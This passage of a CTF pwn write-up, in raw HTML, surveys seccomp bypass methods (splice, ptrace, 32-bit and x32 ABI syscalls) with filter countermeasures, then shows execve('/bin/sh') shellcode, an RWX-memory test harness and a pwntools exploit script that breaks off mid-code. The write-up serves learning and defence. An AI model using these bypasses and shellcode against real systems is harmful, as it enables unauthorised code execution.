noreferrer\">ptr-yudai / writeups / 2019 / ByteBandits<em>CTF</em>2019 / lemonshell — Bitbucket</a></p>\n<p>Also, in the following challenge both <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> were controlled, but the Flag was leaked to stdout using <code class=\"language-text\">splice</code>:</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/?page=1577875543#pwn-961pts-babyseccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[pwn 961pts] babyseccomp</a></p>\n<p>Another challenge with <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> controlled appears to bypass seccomp by forging an <code class=\"language-text\">execve</code> syscall using <code class=\"language-text\">fork</code> and <code class=\"language-text\">ptrace</code>. (I haven’t fully understood the technical details of this abuse, so I’ll write it up separately.)</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/?page=1577875543#pwn-993pts-adult-seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[pwn 993pts] adult seccomp</a></p>\n<p>As these show, it is sometimes possible to make exploitation work within the set of system calls not controlled by seccomp.</p>\n<p>The following site is useful for finding alternative system calls:</p>\n<p>Reference: <a href=\"https://x64.syscall.sh/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">x64.syscall.sh</a></p>\n<h3 id=\"abusing-ptrace\" style=\"position:relative;\"><a href=\"#abusing-ptrace\" aria-label=\"abusing ptrace permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Abusing ptrace</h3>\n<p>I won’t cover it in detail here, but seccomp bypass techniques using ptrace are also publicly known.</p>\n<p>Reference: <a href=\"https://blog.ssrf.in/post/bypass-seccomp-with-ptrace/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">ptrace を使用して seccomp による制限を回避してみる</a></p>\n<h3 id=\"bypass-using-32-bit-system-calls\" style=\"position:relative;\"><a href=\"#bypass-using-32-bit-system-calls\" aria-label=\"bypass using 32 bit system calls permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypass Using 32-bit System Calls</h3>\n<p>When the CPU is in Long mode, 32-bit programs can run in compatibility mode.</p>\n<p>Reference: <a href=\"https://en.wikipedia.org/wiki/Long_mode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Long mode - Wikipedia</a></p>\n<p>Since seccomp controls by system call number, switching the code segment to issue 32-bit system calls — which differ from the 64-bit ones — can bypass the seccomp filter.</p>\n<p>Reference: 詳解セキュリティコンテスト P.480</p>\n<p>However, to prevent this bypass, seccomp filters may include an architecture validation check.</p>\n<p>The following filter from an earlier section is an example of a countermeasure against this bypass:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> arch<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> AUDIT_ARCH_X86_64<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span></code></pre></div>\n<h3 id=\"seccomp-bypass-using-32-bit-abi\" style=\"position:relative;\"><a href=\"#seccomp-bypass-using-32-bit-abi\" aria-label=\"seccomp bypass using 32 bit abi permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>seccomp Bypass Using 32-bit ABI</h3>\n<p>The 32-bit ABI is a 64-bit interface that uses 32-bit addressing; unlike the previous approach, it can issue 32-bit system calls without switching the code segment.</p>\n<p>This allows x86 system calls to be issued and seccomp to be bypassed even when seccomp is validating the x86_64 architecture.</p>\n<p>The following is a helpful reference for bypassing seccomp using the 32-bit ABI:</p>\n<p>Reference: <a href=\"https://tripoloski1337.github.io/ctf/2021/07/12/bypassing-seccomp-prctl.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Bypassing seccomp BPF filter | tripoloski blog</a></p>\n<p>When implementing a countermeasure against this exploit on the seccomp side, a filter that checks whether the <code class=\"language-text\">__X32_SYSCALL_BIT</code> flag is set when the system call information is loaded can be added.</p>\n<p>Alternatively, <code class=\"language-text\">if (A &lt; 0x40000000)</code> can verify whether the system call value is in the 32-bit ABI range.</p>\n<p>Note: using the x86 ABI requires the kernel to be built with <code class=\"language-text\">CONFIG_X86_X32=y</code>.</p>\n<p>You can check this setting with:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">zgrep CONFIG_X86_X32 /proc/config.gz</code></pre></div>\n<p>Reference: <a href=\"https://cds.cern.ch/record/1528222/files/LHCb-TALK-2013-060.pdf\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">ROOT and x32-ABI</a></p>\n<p>Reference: <a href=\"https://unix.stackexchange.com/questions/121424/linux-and-x32-abi-how-to-use\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">memory - Linux and x32-ABI - How to use? - Unix &#x26; Linux Stack Exchange</a></p>\n<p>However, after searching past writeups, I found multiple examples of bypassing seccomp with x86 ABI to run system calls like <code class=\"language-text\">open</code>, <code class=\"language-text\">read</code>, and <code class=\"language-text\">write</code>, but could not find any examples of launching <code class=\"language-text\">/bin/sh</code>.</p>\n<p>Also, testing with the following code and the <code class=\"language-text\">__X32_SYSCALL_BIT</code> flag, <code class=\"language-text\">write</code> worked but <code class=\"language-text\">execve</code> did not.</p>\n<p>(I suspect that executing 64-bit programs is not possible via 32-bit ABI, but I couldn’t find a definitive source; I’ll update this when I find one.)</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">_GNU_SOURCE</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/syscall.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdint.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    \n    <span class=\"token function\">syscall</span><span class=\"token punctuation\">(</span>SYS_write<span class=\"token operator\">|</span>__X32_SYSCALL_BIT<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Test x86 ABI.\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">15</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>path <span class=\"token operator\">=</span> <span class=\"token string\">\"/bin/ls\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>args<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span> <span class=\"token string\">\"ls\"</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>env<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span> <span class=\"token constant\">NULL</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">syscall</span><span class=\"token punctuation\">(</span>SYS_execve<span class=\"token operator\">|</span>__X32_SYSCALL_BIT<span class=\"token punctuation\">,</span> <span class=\"token string\">\"/bin/ls\"</span><span class=\"token punctuation\">,</span> args<span class=\"token punctuation\">,</span> env<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 957px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/14536841a1188e5afad1a6c6fb15ffd5/6bff2/image-20240621005044485.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAi0lEQVQI142OywrDIBREDQYL1kcjYmKhJjTSSOz//95Ub1fddTHMGZj7YDnvWNeEUg7UeiKlBymEAO89xnEEY+x/9WXxHnGUF+r7JF7igm1bsbdj1loYo+Gcg9YK4iIwTTcopSjLqyS21kC1zPb8bIsqus9zoGEpJRV1417uX37FMQwDMef8x4UQ5B/LhEZUboEkZQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/14536841a1188e5afad1a6c6fb15ffd5/8ac56/image-20240621005044485.webp 240w,\n/static/14536841a1188e5afad1a6c6fb15ffd5/d3be9/image-20240621005044485.webp 480w,\n/static/14536841a1188e5afad1a6c6fb15ffd5/c15ec/image-20240621005044485.webp 957w\"\n              sizes=\"(max-width: 957px) 100vw, 957px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/14536841a1188e5afad1a6c6fb15ffd5/8ff5a/image-20240621005044485.png 240w,\n/static/14536841a1188e5afad1a6c6fb15ffd5/e85cb/image-20240621005044485.png 480w,\n/static/14536841a1188e5afad1a6c6fb15ffd5/6bff2/image-20240621005044485.png 957w\"\n            sizes=\"(max-width: 957px) 100vw, 957px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/14536841a1188e5afad1a6c6fb15ffd5/6bff2/image-20240621005044485.png\"\n            alt=\"image-20240621005044485\"\n            title=\"image-20240621005044485\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"about-execve-and-execveat\" style=\"position:relative;\"><a href=\"#about-execve-and-execveat\" aria-label=\"about execve and execveat permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About execve and execveat</h2>\n<p>In the previous section, I briefly summarized general seccomp bypass methods.</p>\n<p>Before considering which bypass is applicable here, I want to understand what operations become unavailable when <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked — as in this challenge binary.</p>\n<p>First, <code class=\"language-text\">execve</code> is a system call that executes the program referenced by the given pathname.</p>\n<p>It replaces the current process image and starts a new program.</p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/execve.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">execve(2) - Linux manual page</a></p>\n<p>According to <em>Understanding the Linux Kernel, 3rd Edition</em>, various functions that can execute programs — such as <code class=\"language-text\">execl</code>, <code class=\"language-text\">execlp</code>, <code class=\"language-text\">execle</code>, <code class=\"language-text\">execv</code>, and <code class=\"language-text\">execvp</code> — are all wrapper routines around <code class=\"language-text\">execve</code> and internally depend on it.</p>\n<p>Therefore, when <code class=\"language-text\">execve</code> is controlled by seccomp, these functions also become unavailable.</p>\n<p>Also, <code class=\"language-text\">system</code> uses <code class=\"language-text\">fork</code> to create a child process that runs a given shell command, and uses <code class=\"language-text\">execl</code> internally.</p>\n<p>So if <code class=\"language-text\">execve</code> is controlled, <code class=\"language-text\">system</code> becomes unavailable as well.</p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man3/system.3.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">system(3) - Linux manual page</a></p>\n<p>However, even when <code class=\"language-text\">execve</code> is blocked, the <code class=\"language-text\">execveat</code> system call may still be usable.</p>\n<p><code class=\"language-text\">execveat</code> works like <code class=\"language-text\">execve</code> but offers more flexible path specification.</p>\n<p><code class=\"language-text\">execveat</code> can execute a program referenced by a combination of <code class=\"language-text\">dirfd</code> and <code class=\"language-text\">pathname</code>, allowing execution via a path relative to the directory referenced by <code class=\"language-text\">dirfd</code>.</p>\n<p>Reference: <a href=\"https://www.man7.org/linux/man-pages/man2/execveat.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">execveat(2) - Linux manual page</a></p>\n<p>As shown, when both <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked, executing any shell or program available on the Linux system becomes extremely difficult.</p>\n<p>The following writeup explicitly states that binary execution is impossible when both <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked:</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/?page=1577875543#pwn-993pts-adult-seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[pwn 993pts] adult seccomp</a></p>\n<h2 id=\"shell-code-introduction\" style=\"position:relative;\"><a href=\"#shell-code-introduction\" aria-label=\"shell code introduction permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Shell Code Introduction</h2>\n<h3 id=\"creating-a-shell-code\" style=\"position:relative;\"><a href=\"#creating-a-shell-code\" aria-label=\"creating a shell code permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Creating a Shell Code</h3>\n<p>From here, I’ll work on creating Shell Code to retrieve the Flag.</p>\n<p>Shell Code refers to a set of machine-code instructions; by sending this kind of Shell Code as a payload to a vulnerable service, it can be used to exploit vulnerabilities and execute arbitrary code.</p>\n<p>A ROP chain is also conceptually related — it links ROP gadgets corresponding to individual Shell Code instructions.</p>\n<p>Below is an example of simple Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\"><span class=\"token keyword\">BITS 64</span>\n<span class=\"token keyword\">global _start</span>\n\n<span class=\"token label function\">_start:</span>\n    mov <span class=\"token register variable\">rdi</span>, binsh\n    lea <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0</span>\n    lea <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>\n    mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">59</span> <span class=\"token comment\">; execve</span>\n    syscall\n\n<span class=\"token keyword\">section .data</span>\n    binsh db <span class=\"token string\">\"/bin/sh\"</span>, <span class=\"token number\">0</span></code></pre></div>\n<p>This assembly code can be built with the following commands:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Generate Shell Code</span>\nnasm shellcode.s -O0 -f bin -o shellcode\n\n<span class=\"token comment\"># Compile as ELF</span>\nnasm shellcode.s -f elf64 <span class=\"token punctuation\">;</span> ld shellcode.o -o shellcode</code></pre></div>\n<p>Using <code class=\"language-text\">nasm shellcode.s -O0 -f bin -o shellcode</code> produces the assembly as-is without optimization.</p>\n<p>Using <code class=\"language-text\">nasm shellcode.s -f elf64 ; ld shellcode.o -o shellcode</code> links the Shell Code as an ELF, allowing you to actually test and debug the behavior.</p>\n<p>To directly test created Shell Code, you can use the following code:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/mman.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">void</span> <span class=\"token operator\">*</span>exec_mem <span class=\"token operator\">=</span> <span class=\"token function\">mmap</span><span class=\"token punctuation\">(</span><span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">,</span> PROT_READ <span class=\"token operator\">|</span> PROT_WRITE <span class=\"token operator\">|</span> PROT_EXEC<span class=\"token punctuation\">,</span> MAP_ANON <span class=\"token operator\">|</span> MAP_PRIVATE<span class=\"token punctuation\">,</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>exec_mem <span class=\"token operator\">==</span> MAP_FAILED<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"mmap\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">char</span> binsh<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"/bin/sh\"</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"System: %p\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">*</span>system<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"binsh: %p\\n\"</span><span class=\"token punctuation\">,</span> binsh<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Enter machine code:\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">char</span> input<span class=\"token punctuation\">[</span><span class=\"token number\">4096</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"fgets\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">munmap</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">memcpy</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">,</span> input<span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">asm</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"jmp *%0\"</span> <span class=\"token operator\">::</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">munmap</span><span class=\"token punctuation\">(</span>exec_mem<span class=\"token punctuation\">,</span> <span class=\"token number\">4096</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Sending Shell Code to this compiled binary embeds the Shell Code in memory and executes it.</p>\n<p>The following Python script can be used for testing:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\ncontext<span class=\"token punctuation\">.</span>log_level <span class=\"token operator\">=</span> <span class=\"token string\">\"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *(main+389)\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./a.out\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\"># target = remote(\"address\", port)</span>\n    target <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"System:\"</span><span class=\"token punctuation\">)</span>\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"binsh:\"</span><span class=\"token punctuation\">)</span>\nbinsh_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rdi, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>binsh_addr<span class=\"token punctuation\">}</span></span><span class=\"token 